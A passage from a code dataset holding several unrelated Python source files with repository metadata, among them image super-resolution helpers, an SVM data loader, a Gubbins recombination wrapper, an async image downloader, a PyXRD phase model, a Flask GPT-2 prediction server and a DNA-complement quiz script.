a, b, r, r])\n X = tf.transpose(X, (0, 1, 2, 4, 3)) # bsize, a, b, 1, 1\n X = tf.split(X, a, 1) # a, [bsize, b, r, r]\n X = tf.concat([tf.squeeze(x) for x in X], 2) # bsize, b, a*r, r\n X = tf.split(X, b, 1) # b, [bsize, a*r, r]\n X = tf.concat([tf.squeeze(x) for x in X], 2 ) # bsize, a*r, b*r\n return tf.reshape(X, [-1, a*r, b*r, 1])\n\ndef PS(X, r):\n # Main OP that you can arbitrarily use in you tensorflow code\n Xc = tf.split(X, 3, 3)\n X = tf.concat([_phase_shift(x, r) for x in Xc], 3)\n return X\n\ndef normalize(x, norm0):\n if norm0:\n return x / 255.0\n else:\n return x / 127.5 - 1.0\n\ndef denormalize(x, norm0):\n if norm0:\n return x * 255.0\n else:\n return (x + 1.0) * 127.5\n\ndef image_generator(batch_size, img_dir, config, shuffle=True, augment=True):\n \"\"\"A generator that returns small images and large images. DO NOT ALTER the validation set\"\"\"\n input_filenames = glob.glob(img_dir + \"/*-in.jpg\")\n counter = 0\n if shuffle:\n random.shuffle(input_filenames)\n #Data augmentation\n data_gen_args_cust = dict(#featurewise_center=True,\n #featurewise_std_normalization=True,\n #zca_whitening=True,\n rotation_range=90,\n brightness_range=(0.5, 1.0), # 0 is black, 1 is same image\n channel_shift_range=30, # value in [-channel_shift_range, channel_shift_range] added to each channel\n width_shift_range=0.2,\n height_shift_range=0.2,\n vertical_flip=True,\n horizontal_flip=True,\n shear_range=0.2,\n zoom_range=0.2)\n data_gen_args = dict(#featurewise_center=True,\n #featurewise_std_normalization=True,\n #zca_whitening=True,\n #rotation_range=90,\n brightness_range=(0.5, 1.0), # 0 is black, 1 is same image\n channel_shift_range=30, # value in [-channel_shift_range, channel_shift_range] added to each channel\n #width_shift_range=0.2,\n #height_shift_range=0.2,\n vertical_flip=True,\n horizontal_flip=True)\n #shear_range=0.2,\n #zoom_range=0.2)\n\n while True:\n small_images = np.zeros(\n (batch_size, config.input_width, config.input_height, 3))\n large_images = np.zeros(\n (batch_size, config.output_width, config.output_height, 3))\n if counter+batch_size >= len(input_filenames) or not shuffle:\n counter = 0\n for i in range(batch_size):\n img = input_filenames[counter + i]\n small_images[i] = np.array(Image.open(img))\n large_images[i] = np.array(\n Image.open(img.replace(\"-in.jpg\", \"-out.jpg\")))\n\n if img_dir == config.train_dir and augment:\n sel_custom = random.randint(1, 4) == 3 and config.custom_aug\n if sel_custom:\n image_datagen = ImageDataGenerator(**data_gen_args_cust)\n #print(data_gen_args_cust)\n else:\n image_datagen = ImageDataGenerator(**data_gen_args)\n # print(data_gen_args)\n seed = random.randint(1, 100000)\n gen0 = image_datagen.flow(small_images, batch_size=config.batch_size, shuffle=False, seed=seed)\n gen1 = image_datagen.flow(large_images, batch_size=config.batch_size, shuffle=False, seed=seed)\n small_images_augmented, large_images_augmented = next(zip(gen0, gen1))\n small_images_augmented = normalize(small_images_augmented, config.norm0)\n large_images_augmented = normalize(large_images_augmented, config.norm0)\n\n #small_image_resized = resize(large_images_augmented, (config.batch_size, config.input_width, config.input_height, 3), preserve_range=True, order=1, anti_aliasing=False)\n if sel_custom:\n small_images_augmented = resize(large_images_augmented, (config.batch_size, config.input_width, config.input_height, 3), preserve_range=True, order=1, anti_aliasing=False)\n\n # totalerr = 0\n # for i in range(config.batch_size):\n # err = np.sum((small_images[i].astype(\"float\") - small_image_resized[i].astype(\"float\")) ** 2)\n # err /= float(small_images[i].shape[0] * small_images[i].shape[1])\n # totalerr += err\n # print(\"===Resizing difference=\" + str(totalerr/config.batch_size))\n\n # if counter == 0:\n # augment = [np.concatenate([large_images[i], denormalize(large_images_augmented[i], config.norm0)], axis=1) for i in range(5)]\n # augment_con = np.transpose(np.concatenate(augment), axes=(0, 1, 2))\n # #np.savetxt(\"debug_aug.txt\", augment_con[:,:,0], fmt='%.2f')\n # wandb.log({\n # \"augment\": [wandb.Image(augment_con)]\n # }, commit=False)\n\n yield (small_images_augmented, large_images_augmented)\n else:\n small_images = normalize(small_images, config.norm0)\n large_images = normalize(large_images, config.norm0)\n yield (small_images, large_images)\n counter += batch_size\n\n\nclass ImageLogger(Callback):\n def __init__(self, config, reconstruction=0, attention=0):\n self.config = config\n self.reconstruction = reconstruction\n self.attention = attention\n def on_epoch_end(self, epoch, logs):\n config = self.config\n reconstruction = self.reconstruction\n attention = self.attention\n in_sample_images, out_sample_images = next(image_generator(7, config.val_dir, config, shuffle=True))\n preds = self.model.predict(in_sample_images)\n # Simple upsampling\n in_resized = [in_sample_images[i].repeat(8, axis=0).repeat(8, axis=1) for i in range(len(in_sample_images))]\n\n # To see predictions on train set\n in_sample_images_train, out_sample_images_train = next(image_generator(7, config.train_dir, config, shuffle=True, augment=False))\n preds_train = self.model.predict(in_sample_images_train)\n in_resized_train = [in_sample_images_train[i].repeat(8, axis=0).repeat(8, axis=1) for i in range(len(in_sample_images_train))]\n\n # To see learning evolution on a test image\n img_lr = np.zeros((5, config.input_width, config.input_height, 3))\n img_hr = np.zeros((5, config.output_width, config.output_height, 3))\n img_name = [\"data/test/4738140013-rose-in.jpg\", \"data/test/35869417191-hydrangea-in.jpg\", \"data/test/35825252922-orchid-in.jpg\", \"data/test/7503047224-daisy-in.jpg\", \"data/test/flowers-petals-plants-39517-in.jpg\"]\n for i in range(len(img_name)):\n img_lr[i] = normalize(np.array(Image.open(img_name[i])), config.norm0)\n img_hr[i] = normalize(np.array(Image.open(img_name[i].replace(\"-in.jpg\", \"-out.jpg\"))), config.norm0)\n preds_learn = self.model.predict(img_lr)\n in_resized_learn = [img_lr[i].repeat(8, axis=0).repeat(8, axis=1) for i in range(len(img_name))]\n\n # Intermediate logging of attention mask\n preds_rec = reconstruction.predict(in_sample_images)\n preds_att = np.repeat(attention.predict(in_sample_images), 3, axis=-1)\n preds_learn_rec = reconstruction.predict(img_lr)\n preds_learn_att = np.repeat(attention.predict(img_lr), 3, axis=-1)\n\n # Output log formatting\n out_pred = [np.concatenate([denormalize(in_resized[i], config.norm0), denormalize(o, config.norm0), denormalize(out_sample_images[i], config.norm0), denormalize(preds_rec[i], not config.norm0), denormalize(preds_att[i], config.norm0)], axis=1) for i, o in enumerate(preds)]\n img_pred_con = np.transpose(np.concatenate(out_pred), axes=(0, 1, 2))\n out_train = [np.concatenate([denormalize(in_resized_train[i], config.norm0), denormalize(o, config.norm0), denormalize(out_sample_images_train[i], config.norm0)], axis=1) for i, o in enumerate(preds_train)]\n img_train_con = np.transpose(np.concatenate(out_train), axes=(0, 1, 2))\n out_learn = [np.concatenate([denormalize(in_resized_learn[i], config.norm0), denormalize(o, config.norm0), denormalize(img_hr[i], config.norm0), denormalize(preds_learn_rec[i], not config.norm0), denormalize(preds_learn_att[i], config.norm0)], axis=1) for i, o in enumerate(preds_learn)]\n img_learn_con = np.transpose(np.concatenate(out_learn), axes=(0, 1, 2))\n\n img_pred_con_pil = Image.fromarray(np.clip(img_pred_con, 0, 255).astype(\"uint8\"), mode='RGB')\n img_train_con_pil = Image.fromarray(np.clip(img_train_con, 0, 255).astype(\"uint8\"), mode='RGB')\n img_learn_con_pil = Image.fromarray(np.clip(img_learn_con, 0, 255).astype(\"uint8\"), mode='RGB')\n\n # # Test debug\n # weights_att, bias_att = attention.layers[-1].get_weights()\n # weights_rec, bias_rec = reconstruction.layers[-1].get_weights()\n # print(weights_rec[:,:,0,0])\n # print(bias_rec)\n # print(np.concatenate([weights_att[:,:,i,0] for i in range(32)]))\n # print(bias_att)\n # grads = K.gradients(loss, model.input)[0]\n # print(grads)\n # np.savetxt(\"debug_rec.txt\"%epoch, weights[:,:,0,0], fmt='%.2f')\n # np.savetxt(\"debug_att%d.txt\"%epoch, preds_att[0,:,:,0], fmt='%.2f')\n # np.savetxt(\"debug2.txt\", denormalize(preds[0,:,:,1], config.norm0), fmt='%.2f')\n # np.savetxt(\"debug3.txt\", denormalize(preds[0,:,:,1], config.norm0).astype(\"uint8\"), fmt='%.2f')\n\n # zeros = np.zeros((config.output_width, config.output_height, 3))\n # ones = np.ones((config.output_width, config.output_height, 3))\n # grey = ones / 2.0\n # zeros_ones = np.concatenate([denormalize(zeros, config.norm0), denormalize(grey, config.norm0), denormalize(ones, config.norm0)])\n # ones_ones = np.concatenate([denormalize(ones, config.norm0), denormalize(grey, config.norm0), denormalize(ones, config.norm0)])\n # wandb.log({\n # \"zeros_ones\": [wandb.Image(zeros_ones, caption=\"zeros_ones\")]\n # , \"ones_ones\": [wandb.Image(ones_ones, caption=\"ones_ones\")]\n # }, commit=False)\n\n\n #Create gif for training\n if epoch == 0:\n Image.fromarray(np.clip(img_learn_con, 0, 255).astype(\"uint8\")).save('train.gif', format='GIF', save_all=True, duration=500, loop=0)\n else:\n gif_pil = Image.open('train.gif')\n gif_frames = []\n for frame in range(0, gif_pil.n_frames):\n gif_pil.seek(frame)\n gif_frames.append([np.array(gif_pil), gif_pil.getpalette()])\n gif_frames_pil = []\n for f, palette in gif_frames:\n image = Image.fromarray(f.astype(\"uint8\"))\n image.putpalette(palette)\n gif_frames_pil.append(image)\n gif_frames_pil.append(Image.fromarray(np.clip(img_learn_con, 0, 255).astype(\"uint8\")))\n gif_frames_pil[0].save('train.gif', format='GIF', append_images=gif_frames_pil[1:], save_all=True, duration=500, loop=0)\n\n wandb.log({\n \"predict\": [wandb.Image(img_pred_con_pil)]\n , \"train\": [wandb.Image(img_train_con_pil)]\n , \"learn\": [wandb.Image(img_learn_con_pil)]\n }, commit=False)\n","repo_name":"geoffreywalter/superres","sub_path":"helpfunc.py","file_name":"helpfunc.py","file_ext":"py","file_size_in_byte":13741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36121478014","text":"def load_data_set(file_name):\n data_mat = []; label_mat = []\n fr = open(file_name)\n for line in fr.readlines():\n line_arry = line.strip().split()\n data_mat.append([float(line_arry[0]), float(line_arry[1])])\n label_mat.append(float(line_arry[2]))\n return data_mat, label_mat\n\ndef select_J_rand(i, m):\n j = i\n while (j == i):\n j = int(random.unform(0, m))\n return j\n\ndef clip_alpha(aj, H, L):\n if aj > H:\n aj = H\n if L > aj:\n aj = L\n return aj","repo_name":"Tang-Xianglong/Machine_Learning","sub_path":"svmMLiA.py","file_name":"svmMLiA.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15880521819","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\nimport os\nimport sys\nimport subprocess\nfrom Bio import SeqIO\n\ndef identify_recombinations_with_gubbins(aln,recipient_id,recipient_mapping,tmp,prefix,recombinant,\n recombinant_name,window_min,window_max,snps_min,gubbins_p):\n\n # Avoid circular import\n from recognise.recombination import Recombination\n\n # Get ID of recombinant - note the FASTA ID does not have to match the recombinant name\n aln_index = SeqIO.index(aln,'fasta')\n recombinant_id = None\n for id in aln_index.keys():\n if id != recipient_id:\n recombinant_id = id\n # Run Gubbins\n subprocess.check_output('run_gubbins.py --prefix ' + os.path.join(tmp,prefix) + \\\n ' --pairwise ' + \\\n ' --min-window-size ' + str(window_min) + \\\n ' --max-window-size ' + str(window_max) + \\\n ' --p-value ' + str(gubbins_p) + \\\n ' --min-snps ' + str(snps_min) + \\\n ' --outgroup ' + recombinant_id + \\\n ' ' + aln + \\\n ' &> /dev/null',\n shell = True)\n # Process output\n recombination_list = []\n with open(os.path.join(tmp,prefix + '.recombination_predictions.gff'),'r') as rec_file:\n for line in rec_file.readlines():\n if not line.startswith('#'):\n info = line.rstrip().split()\n extra_vals = info[8].split('\"')\n recombination_list.append(\n Recombination(\n start = recipient_mapping[int(info[3])],\n end = recipient_mapping[int(info[4])],\n p_val = float(extra_vals[3]),\n snp_count = int(extra_vals[7]),\n recombinant = recombinant_name,\n insertions_spanned = 0,\n insertions_matched = 0,\n deletions_spanned = 0,\n deletions_matched = 0\n )\n )\n return recombination_list\n","repo_name":"nickjcroucher/recognise","sub_path":"recognise/gubbins.py","file_name":"gubbins.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27027768837","text":"import asyncio\r\nimport os\r\n\r\nimport aiohttp\r\n\r\n\r\nclass ImageSave:\r\n \"\"\"图片异步存储\"\"\"\r\n\r\n def __init__(self):\r\n self.astrict = None\r\n self.__semaphore = None\r\n\r\n @staticmethod\r\n def __create_path(iamge_path): # 路径创建\r\n path = os.path.split(iamge_path)[0]\r\n if path:\r\n if os.path.exists(path):\r\n pass\r\n else:\r\n os.makedirs(path)\r\n\r\n async def __job(self, session, url_data):\r\n async with self.__semaphore:\r\n img = await session.get(url_data[0]) # 触发到await就切换,等待get到数据\r\n img_code = await img.read() # 读取内容\r\n image_path = url_data[1]\r\n self.__create_path(image_path)\r\n with open(str(image_path), 'wb') as f:\r\n f.write(img_code)\r\n\r\n async def __create_session(self, loop, urls):\r\n timeout = aiohttp.ClientTimeout(total=5) # 超时检测\r\n async with aiohttp.ClientSession(timeout=timeout) as session: # 建立会话session\r\n tasks = [loop.create_task(self.__job(session, url_data)) for url_data in urls] # 建立所有任务\r\n await asyncio.wait(tasks)\r\n\r\n def __create_loop(self, url_list):\r\n loop = asyncio.get_event_loop()\r\n loop.run_until_complete(self.__create_session(loop, url_list))\r\n\r\n def image_save(self, image_url, image_path, astrict=100):\r\n \"\"\"单张图片保存\"\"\"\r\n self.astrict = astrict\r\n image_iteration = [[image_url, image_path]]\r\n self.__semaphore = asyncio.Semaphore(self.astrict) # 限制并发量为500\r\n self.__data_detection(image_iteration)\r\n self.__create_loop(image_iteration)\r\n\r\n def images_save(self, image_iteration, astrict=100):\r\n \"\"\"多张图片保存[[链接:文件保存地址]]\"\"\"\r\n self.astrict = astrict\r\n self.__semaphore = asyncio.Semaphore(self.astrict) # 限制并发量为500\r\n self.__data_detection(image_iteration)\r\n self.__create_loop(image_iteration)\r\n\r\n @staticmethod\r\n def __data_detection(iteration_data):\r\n for url_data in iteration_data:\r\n if 'http' != str(url_data[0][:4]).lower():\r\n raise ValueError('数据中的第一个参数不是一个链接,因为它没有携带http协议')\r\n if '.' not in str(url_data[1]):\r\n raise ValueError('数据中的第二个参数没有后缀名称')\r\n\r\n\r\nimage_save = ImageSave().image_save\r\nimages_save = ImageSave().images_save\r\n","repo_name":"kuangjianke/crawles","sub_path":"crawles/data_save/image_save.py","file_name":"image_save.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5220700013","text":"from warnings import warn\nfrom random import choice\n\nfrom mvc import Observer\nfrom mvc.observers import ListObserver\nfrom mvc.models.properties import (\n StringProperty, SignalMixin, BoolProperty, LabeledProperty,\n FloatProperty, ListProperty\n)\n\nfrom pyxrd.generic.io import storables, get_case_insensitive_glob\n\nfrom pyxrd.generic.models.properties import InheritableMixin, ObserveChildMixin\nfrom pyxrd.refinement.refinables.properties import RefinableMixin\nfrom pyxrd.refinement.refinables.mixins import RefinementGroup\nfrom pyxrd.refinement.refinables.metaclasses import PyXRDRefinableMeta\n\nfrom pyxrd.probabilities.models import get_correct_probability_model\n\nfrom .abstract_phase import AbstractPhase\nfrom .CSDS import DritsCSDSDistribution\nfrom .component import Component\n\n@storables.register()\nclass Phase(RefinementGroup, AbstractPhase, metaclass=PyXRDRefinableMeta):\n\n # MODEL INTEL:\n class Meta(AbstractPhase.Meta):\n store_id = \"Phase\"\n file_filters = [\n (\"Phase file\", get_case_insensitive_glob(\"*.PHS\")),\n ]\n\n _data_object = None\n @property\n def data_object(self):\n self._data_object.type = \"Phase\"\n self._data_object.valid_probs = (all(self.probabilities.P_valid) and all(self.probabilities.W_valid))\n\n if self._data_object.valid_probs:\n self._data_object.sigma_star = self.sigma_star\n self._data_object.CSDS = self.CSDS_distribution.data_object\n\n self._data_object.G = self.G\n self._data_object.W = self.probabilities.get_distribution_matrix()\n self._data_object.P = self.probabilities.get_probability_matrix()\n\n self._data_object.components = [None] * len(self.components)\n for i, comp in enumerate(self.components):\n self._data_object.components[i] = comp.data_object\n else:\n self._data_object.sigma_star = None\n self._data_object.CSDS = None\n self._data_object.G = None\n self._data_object.W = None\n self._data_object.P = None\n self._data_object.components = None\n\n return self._data_object\n\n project = property(AbstractPhase.parent.fget, AbstractPhase.parent.fset)\n\n # PROPERTIES:\n\n #: Flag indicating whether the CSDS distribution is inherited from the\n #: :attr:`based_on` phase or not.\n @BoolProperty(\n default=False, text=\"Inh. mean CSDS\",\n visible=True, persistent=True, tabular=True\n )\n def inherit_CSDS_distribution(self):\n return self._CSDS_distribution.inherited\n @inherit_CSDS_distribution.setter\n def inherit_CSDS_distribution(self, value):\n self._CSDS_distribution.inherited = value\n\n #: Flag indicating whether to inherit the display color from the\n #: :attr:`based_on` phase or not.\n inherit_display_color = BoolProperty(\n default=False, text=\"Inh. display color\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: Flag indicating whether to inherit the sigma start value from the\n #: :attr:`based_on` phase or not.\n inherit_sigma_star = BoolProperty(\n default=False, text=\"Inh. sigma star\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n _based_on_index = None # temporary property\n _based_on_uuid = None # temporary property\n\n #: The :class:`~Phase` instance this phase is based on\n based_on = LabeledProperty(\n default=None, text=\"Based on phase\",\n visible=True, persistent=False, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, ObserveChildMixin)\n )\n @based_on.setter\n def based_on(self, value):\n old = type(self).based_on._get(self)\n if value == None or value.get_based_on_root() == self or value.parent != self.parent:\n value = None\n if value != old:\n type(self).based_on._set(self, value)\n for component in self.components:\n component.linked_with = None\n\n # INHERITABLE PROPERTIES:\n\n #: The sigma star orientation factor\n sigma_star = FloatProperty(\n default=3.0, text=\"σ* [°]\", math_text=\"$\\sigma^*$ [°]\",\n minimum=0.0, maximum=90.0,\n visible=True, persistent=True, tabular=True, refinable=True,\n inheritable=True, inherit_flag=\"inherit_sigma_star\", inherit_from=\"based_on.sigma_star\",\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, RefinableMixin, InheritableMixin)\n )\n\n # A :class:`~pyxrd.phases.models.CSDS` instance\n CSDS_distribution = LabeledProperty(\n default=None, text=\"CSDS Distribution\",\n visible=True, persistent=True, tabular=True, refinable=True,\n inheritable=True, inherit_flag=\"inherit_CSDS_distribution\", inherit_from=\"based_on.CSDS_distribution\",\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, RefinableMixin, InheritableMixin, ObserveChildMixin)\n )\n\n # A :class:`~pyxrd._probabilities.models._AbstractProbability` subclass instance\n probabilities = LabeledProperty(\n default=None, text=\"Probablities\",\n visible=True, persistent=True, tabular=True, refinable=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, RefinableMixin, ObserveChildMixin)\n )\n @probabilities.setter\n def probabilities(self, value):\n type(self).probabilities._set(self, value)\n if value is not None:\n value.update()\n\n #: The color this phase's X-ray diffraction pattern should have.\n display_color = StringProperty(\n fset=AbstractPhase.display_color.fset,\n fget=AbstractPhase.display_color.fget,\n fdel=AbstractPhase.display_color.fdel,\n doc=AbstractPhase.display_color.__doc__,\n default=\"#008600\", text=\"Display color\",\n visible=True, persistent=True, tabular=True, widget_type='color',\n inheritable=True, inherit_flag=\"inherit_display_color\", inherit_from=\"based_on.display_color\",\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin, InheritableMixin)\n )\n\n #: The list of components this phase consists of\n components = ListProperty(\n default=None, text=\"Components\",\n visible=True, persistent=True, tabular=True, refinable=True,\n widget_type=\"custom\", data_type=Component,\n mix_with=(RefinableMixin,)\n )\n\n #: The # of components\n @AbstractPhase.G.getter\n def G(self):\n if self.components is not None:\n return len(self.components)\n else:\n return 0\n\n #: The # of components\n @AbstractPhase.R.getter\n def R(self):\n if self.probabilities:\n return self.probabilities.R\n\n # Flag indicating whether or not the links (based_on and linked_with) should\n # be saved as well.\n save_links = True\n\n # REFINEMENT GROUP IMPLEMENTATION:\n @property\n def refine_title(self):\n return self.name\n\n @property\n def refine_descriptor_data(self):\n return dict(\n phase_name=self.refine_title,\n component_name=\"*\"\n )\n\n # ------------------------------------------------------------\n # Initialization and other internals\n # ------------------------------------------------------------\n def __init__(self, *args, **kwargs):\n\n my_kwargs = self.pop_kwargs(kwargs,\n \"data_CSDS_distribution\", \"data_sigma_star\", \"data_components\",\n \"data_G\", \"G\", \"data_R\", \"R\",\n \"data_probabilities\", \"based_on_uuid\", \"based_on_index\",\n \"inherit_probabilities\",\n *[prop.label for prop in Phase.Meta.get_local_persistent_properties()]\n )\n super(Phase, self).__init__(*args, **kwargs)\n kwargs = my_kwargs\n\n with self.data_changed.hold():\n\n CSDS_distribution = self.get_kwarg(kwargs, None, \"CSDS_distribution\", \"data_CSDS_distribution\")\n self.CSDS_distribution = self.parse_init_arg(\n CSDS_distribution, DritsCSDSDistribution, child=True,\n default_is_class=True, parent=self\n )\n self.inherit_CSDS_distribution = self.get_kwarg(kwargs, False, \"inherit_CSDS_distribution\")\n\n self.display_color = self.get_kwarg(kwargs, choice(self.line_colors), \"display_color\")\n self.inherit_display_color = self.get_kwarg(kwargs, False, \"inherit_display_color\")\n\n self.sigma_star = self.get_kwarg(kwargs, self.sigma_star, \"sigma_star\", \"data_sigma_star\")\n self.inherit_sigma_star = self.get_kwarg(kwargs, False, \"inherit_sigma_star\")\n\n self.components = self.get_list(kwargs, [], \"components\", \"data_components\", parent=self)\n\n G = int(self.get_kwarg(kwargs, 1, \"G\", \"data_G\"))\n R = int(self.get_kwarg(kwargs, 0, \"R\", \"data_R\"))\n if G is not None and G > 0:\n for i in range(len(self.components), G):\n new_comp = Component(name=\"Component %d\" % (i + 1), parent=self)\n self.components.append(new_comp)\n self.observe_model(new_comp)\n\n # Observe components\n for component in self.components:\n self.observe_model(component)\n\n # Connect signals to lists and dicts:\n self._components_observer = ListObserver(\n self.on_component_inserted,\n self.on_component_removed,\n prop_name=\"components\",\n model=self\n )\n\n self.probabilities = self.parse_init_arg(\n self.get_kwarg(kwargs, None, \"probabilities\", \"data_probabilities\"),\n get_correct_probability_model(R, G), default_is_class=True, child=True)\n self.probabilities.update() # force an update\n inherit_probabilities = kwargs.pop(\"inherit_probabilities\", None)\n if inherit_probabilities is not None:\n for prop in self.probabilities.Meta.get_inheritable_properties():\n setattr(self.probabilities, prop.inherit_flag, bool(inherit_probabilities))\n\n self._based_on_uuid = self.get_kwarg(kwargs, None, \"based_on_uuid\")\n self._based_on_index = self.get_kwarg(kwargs, None, \"based_on_index\")\n\n def __repr__(self):\n return \"Phase(name='%s', based_on=%r)\" % (self.name, self.based_on)\n\n # ------------------------------------------------------------\n # Notifications of observable properties\n # ------------------------------------------------------------\n def on_component_inserted(self, item):\n # Set parent and observe the new component (visuals changed signals):\n if item.parent != self: item.parent = self\n self.observe_model(item)\n\n def on_component_removed(self, item):\n with self.data_changed.hold_and_emit():\n # Clear parent & stop observing:\n item.parent = None\n self.relieve_model(item)\n\n @Observer.observe(\"data_changed\", signal=True)\n def notify_data_changed(self, model, prop_name, info):\n if isinstance(model, Phase) and model == self.based_on:\n with self.data_changed.hold():\n # make sure inherited probabilities are up-to-date\n self.probabilities.update()\n self.data_changed.emit(arg=\"based_on\")\n else:\n self.data_changed.emit()\n\n @Observer.observe(\"visuals_changed\", signal=True)\n def notify_visuals_changed(self, model, prop_name, info):\n self.visuals_changed.emit()\n\n # ------------------------------------------------------------\n # Input/Output stuff\n # ------------------------------------------------------------\n def resolve_json_references(self):\n # Set the based on and linked with variables:\n if hasattr(self, \"_based_on_uuid\") and self._based_on_uuid is not None:\n self.based_on = type(type(self)).object_pool.get_object(self._based_on_uuid)\n del self._based_on_uuid\n elif hasattr(self, \"_based_on_index\") and self._based_on_index is not None and self._based_on_index != -1:\n warn(\"The use of object indices is deprecated since version 0.4. Please switch to using object UUIDs.\", DeprecationWarning)\n self.based_on = self.parent.phases.get_user_from_index(self._based_on_index)\n del self._based_on_index\n for component in self.components:\n component.resolve_json_references()\n with self.data_changed.hold():\n # make sure inherited probabilities are up-to-date\n self.probabilities.update()\n\n def _pre_multi_save(self, phases, ordered_phases):\n ## Override from base class\n\n if self.based_on != \"\" and not self.based_on in phases:\n self.save_links = False\n Component.export_atom_types = True\n for component in self.components:\n component.save_links = self.save_links\n\n # Make sure parent is first in ordered list:\n if self.based_on in phases:\n index = ordered_phases.index(self)\n index2 = ordered_phases.index(self.based_on)\n if index < index2:\n ordered_phases.remove(self.based_on)\n ordered_phases.insert(index, self.based_on)\n\n def _post_multi_save(self):\n ## Override from base class\n self.save_links = True\n for component in self.components:\n component.save_links = True\n Component.export_atom_types = False\n\n def json_properties(self):\n retval = super(Phase, self).json_properties()\n if not self.save_links:\n for prop in self.Meta.all_properties:\n if getattr(prop, \"inherit_flag\", False):\n retval[prop.inherit_flag] = False\n retval[\"based_on_uuid\"] = \"\"\n else:\n retval[\"based_on_uuid\"] = self.based_on.uuid if self.based_on else \"\"\n return retval\n\n # ------------------------------------------------------------\n # Methods & Functions\n # ------------------------------------------------------------\n def _update_interference_distributions(self):\n return self.CSDS_distribution.distrib\n\n def get_based_on_root(self):\n \"\"\"\n Gets the root object in the based_on chain\n \"\"\"\n if self.based_on is not None:\n return self.based_on.get_based_on_root()\n else:\n return self\n\n pass # end of class\n","repo_name":"PyXRD/PyXRD","sub_path":"pyxrd/phases/models/phase.py","file_name":"phase.py","file_ext":"py","file_size_in_byte":14579,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"70927413354","text":"from flask import Flask, request\nfrom GPT2Inference import GPT2\n\napp = Flask(__name__)\ngptModel = GPT2()\n\n@app.route('/')\ndef hello():\n return 'Welcome to the GPT server! \\n use /predict[text] for prediction'\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n text = request.form['text']\n label = gptModel.predict(text)\n label = '' + str(label)\n return label\n\nif __name__ == '__main__':\n app.run(debug = False, port=5000)","repo_name":"hritik5102/Fake-news-classification-model","sub_path":"Server-GPT2/gpt-server.py","file_name":"gpt-server.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"33852594829","text":"#!/usr/bin/env python\n\nimport sys\nimport seqlib\nimport random\n\nif __name__ == '__main__':\n\tif len(sys.argv) >= 2:\n\t\tseqlen = int(sys.argv[1])\n\telse:\n\t\tseqlen = 7\n\n\t#============================\n\tseq = seqlib.makeSequence(seqlen)\n\tanswer = seqlib.flip(seqlib.complement(seq))\n\n\t#============================\n\tif random.random() < 0.5:\n\t\tprint(\"1. Which one of the following sequences is complimentary to the sequence 5'-%s-3'? Hint: pay attention to the 5' and 3' directions!\"%(seq))\n\telse:\n\t\tprint(\"1. Which one of the following sequences is complimentary to the sequence 3'-%s-5'? Hint: pay attention to the 5' and 3' directions!\"%(seqlib.flip(seq)))\n\n\t#============================\n\tchoices = []\n\thalf = int(seqlen//2)\n\n\t#choice 1\n\tchoices.append(seq)\n\t#choice 2\n\tchoices.append(seqlib.flip(seq))\n\t#choice 3\n\tchoices.append(answer)\n\t#choice 4\n\tchoices.append(seqlib.flip(answer))\n\t#choice 5\n\tnube = seq[:half] + answer[half:]\n\tchoices.append(nube)\n\n\t#============================\n\trandom.shuffle(choices)\n\tcharlist = \"ABCDE\"\n\tfor i in range(len(choices)):\n\t\tchoice_msg = choices[i]\n\t\tletter = charlist[i]\n\t\tprefix = \"\"\n\t\tif choice_msg == answer:\n\t\t\tprefix = \"*\"\n\t\tprint(\"%s%s. 5'-%s-3'\"%(prefix, letter, choice_msg))\n\t\t\n\t\t\n","repo_name":"vosslab/genetics-problems","sub_path":"complement_prime.py","file_name":"complement_prime.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41976685347","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: José Sánchez-Gallego (gallegoj@uw.edu)\n# @Date: 2019-08-05\n# @Filename: exceptions.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\nimport inspect\n\nfrom . import camera\n\n\nclass CameraError(Exception):\n \"\"\"A custom core exception\"\"\"\n\n def __init__(self, message=\"\"):\n stack = inspect.stack()\n f_locals = stack[1][0].f_locals\n\n if \"self\" in f_locals:\n class_ = f_locals[\"self\"]\n if isinstance(class_, camera.BaseCamera):\n camera_name = f_locals[\"self\"].name\n elif isinstance(class_, camera.CameraSystem):\n camera_name = \"CAMERA_SYSTEM\"\n else:\n camera_name = \"UNKNOWN\"\n super().__init__(f\"{camera_name} - {message}\")\n else:\n super().__init__(f\"{message}\")\n\n\nclass CameraConnectionError(CameraError):\n \"\"\"An error to be raised if the camera fails to connect/disconnect.\"\"\"\n\n\nclass ExposureError(Exception):\n \"\"\"The exposure failed.\"\"\"\n\n\nclass FITSModelError(Exception):\n \"\"\"An error related to the FITS model.\"\"\"\n\n\nclass CardError(FITSModelError):\n \"\"\"Error raised by a FITS `.Card`.\"\"\"\n\n\nclass CameraWarning(UserWarning):\n \"\"\"Base warning.\"\"\"\n\n def __init__(self, message, *args, **kwargs):\n stack = inspect.stack()\n f_locals = stack[1][0].f_locals\n\n if \"self\" in f_locals:\n class_ = f_locals[\"self\"]\n if isinstance(class_, camera.BaseCamera):\n camera_name = f_locals[\"self\"].name\n elif isinstance(class_, camera.CameraSystem):\n 